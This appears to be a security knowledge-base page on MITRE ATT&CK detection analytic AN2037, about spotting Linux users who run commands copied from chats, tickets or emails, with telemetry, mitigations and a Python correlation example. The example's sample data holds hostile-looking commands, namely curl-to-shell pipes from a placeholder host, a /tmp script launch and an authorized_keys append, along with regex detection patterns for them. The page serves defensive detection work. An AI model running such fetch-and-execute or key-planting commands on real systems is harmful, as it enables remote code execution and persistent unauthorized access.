AN2037: Analytic 2037
Detects users executing commands copied from chats, tickets, or emails, including curl|bash patterns, shell script launches from temp directories, credential changes, or SSH key additions shortly after communication events.
Analyst context for executives and security teams
This analytic is about a common operational weak point: Linux users running commands that came from chats, tickets, or emails. The business risk is not the communication tool itself, but the moment unverified instructions become shell activity, such as curl-to-shell patterns, scripts launched from temporary directories, credential changes, or SSH key additions shortly after a message event.
Executive priority
Prioritize this as a control-validation and incident-readiness question: can the organization correlate user communications with risky Linux command execution quickly enough to distinguish normal support activity from potentially unsafe instruction-following? This matters for SOC triage quality, insider-risk review, help desk governance, identity hygiene, and audit evidence around privileged access changes.
Technical view
For Linux environments, validate whether endpoint and identity telemetry can show command execution, script location, credential-related changes, SSH key modifications, user context, timing, and nearby communication events. Because no ATT&CK tactic or formal detection logic is supplied, teams should treat AN2037 as a detection concept rather than a complete rule. The useful validation is whether risky shell activity occurring shortly after chats, tickets, or emails can be correlated without excessive noise from legitimate administration.
Likely telemetry
- Linux process execution and command-line telemetry
- Shell history or terminal session records where available and appropriate
- File creation and execution events in temporary directories
- Account, credential, and password change logs
- SSH authorized_keys or equivalent key modification events
Detection direction
- Validate correlation between communication events and subsequent Linux command execution by the same user or on the relevant host.
- Pay special attention to curl-to-shell style command patterns, shell scripts launched from temporary directories, credential changes, and SSH key additions shortly after communication events, as described by the analytic.
- Tune for known administrative workflows, support runbooks, deployment tooling, and approved automation to reduce false positives.
- Confirm whether communication metadata is available to the SOC; without it, the analytic may degrade into generic Linux command monitoring.
- Use this as a hunting and triage enrichment pattern unless local testing proves reliable alerting thresholds.
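As an added illustration of the correlation described above (not the analytic's own logic, which ATT&CK does not supply), the following Python runs the four risky-command checks over constructed sample telemetry and pairs each hit with the latest message the same user received inside a time window; the regexes, the 15-minute window, and the approved-path allowlist are assumptions for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample telemetry (not from the page); both feeds share one ISO-8601 clock.
COMM_EVENTS = [  # a ticket or chat message delivered to a user
    {"ts": "2024-05-01T10:00:00", "user": "alice", "source": "ticket", "ref": "TKT-123"},
    {"ts": "2024-05-01T12:00:00", "user": "bob", "source": "chat", "ref": "MSG-7"},
]
PROC_EVENTS = [  # Linux process execution with full command line
    {"ts": "2024-05-01T10:03:00", "user": "alice", "cmdline": "curl -fsSL https://example.invalid/setup.sh | sudo bash"},
    {"ts": "2024-05-01T10:04:10", "user": "alice", "cmdline": "bash /tmp/fix.sh"},
    {"ts": "2024-05-01T10:05:00", "user": "alice", "cmdline": "passwd"},
    {"ts": "2024-05-01T10:06:00", "user": "alice", "cmdline": "sh -c 'cat key.pub >> /home/alice/.ssh/authorized_keys'"},
    {"ts": "2024-05-01T10:07:00", "user": "alice", "cmdline": "bash /opt/deploy/rollout.sh"},  # approved tooling
    {"ts": "2024-05-01T12:01:00", "user": "bob", "cmdline": "ls -la /tmp"},  # benign
    {"ts": "2024-05-01T15:00:00", "user": "bob", "cmdline": "curl -s https://example.invalid/x.sh | sh"},  # outside window
]

# The four behaviours the analytic names; these regexes are an assumption, not official ATT&CK logic.
RISK_PATTERNS = {
    "curl_to_shell": re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b"),
    "temp_dir_script": re.compile(r"(?:\b(?:ba|z|da)?sh\s+|^)(?:/tmp|/var/tmp|/dev/shm)/\S+"),
    "credential_change": re.compile(r"^(?:sudo\s+)?(?:passwd|chpasswd|usermod\s+-p)\b"),
    "ssh_key_add": re.compile(r">>?\s*\S*/\.ssh/authorized_keys\b"),
}
# Assumed allowlist of known administrative workflow paths (tuning step from the detection direction).
APPROVED_PREFIXES = ("/opt/deploy/",)

def classify(cmdline):
    """Return the sorted risk labels a command line matches, or [] if benign or approved."""
    if any(tok.startswith(APPROVED_PREFIXES) for tok in cmdline.split()):
        return []
    return sorted(name for name, rx in RISK_PATTERNS.items() if rx.search(cmdline))

def correlate(comm_events, proc_events, window=timedelta(minutes=15)):
    """Pair each risky process event with the latest message the same user received within `window`."""
    parse = datetime.fromisoformat
    findings = []
    for proc in proc_events:
        risks = classify(proc["cmdline"])
        if not risks:
            continue
        t = parse(proc["ts"])
        prior = [c for c in comm_events
                 if c["user"] == proc["user"] and timedelta(0) <= t - parse(c["ts"]) <= window]
        if prior:  # no preceding message means no correlation, only generic command monitoring
            latest = max(prior, key=lambda c: c["ts"])
            findings.append({"user": proc["user"], "ref": latest["ref"], "cmdline": proc["cmdline"],
                             "risks": risks, "delay_s": int((t - parse(latest["ts"])).total_seconds())})
    return findings

if __name__ == "__main__":
    for finding in correlate(COMM_EVENTS, PROC_EVENTS):
        print(finding)
```

Widening the window (for example to several hours) pulls in bob's later curl-to-shell command, which shows how directly the window choice trades recall against noise from unrelated administration.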
Mitigation priorities
- Define approved procedures for commands shared through chats, tickets, or emails, especially for privileged Linux administration.
- Require review or safer execution paths for scripts and commands that modify credentials or SSH access.
- Harden monitoring around temporary-directory script execution and sensitive identity changes on Linux systems.
- Maintain audit-ready records linking administrative requests, approvals, and resulting system changes.
- Train support and operations teams to verify command provenance before execution.
Analyst notes and limits
AN2037 is a detection analytic object for enterprise ATT&CK, external ID AN2037, platform Linux. The official description provides the behavioral focus, but no official detection logic, tactic, relationships, aliases, or labels are supplied. The strongest use is as a coverage assessment prompt for SOC, IR, identity, and Linux administration processes.
This take is limited to the supplied ATT&CK fields. It does not assert active exploitation, adversary attribution, coverage effectiveness, or applicability beyond Linux. Local telemetry availability, communication-platform access, privacy constraints, and administrative workflow context are required before operationalizing this analytic.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
All related ATT&CK context
No relationships are available in the current normalized data for this object.
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see the Updates page under ATT&CK resources.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.0 | | Current bundle | 84e9edc90918… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
- [1] mitre-attack: AN2037
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.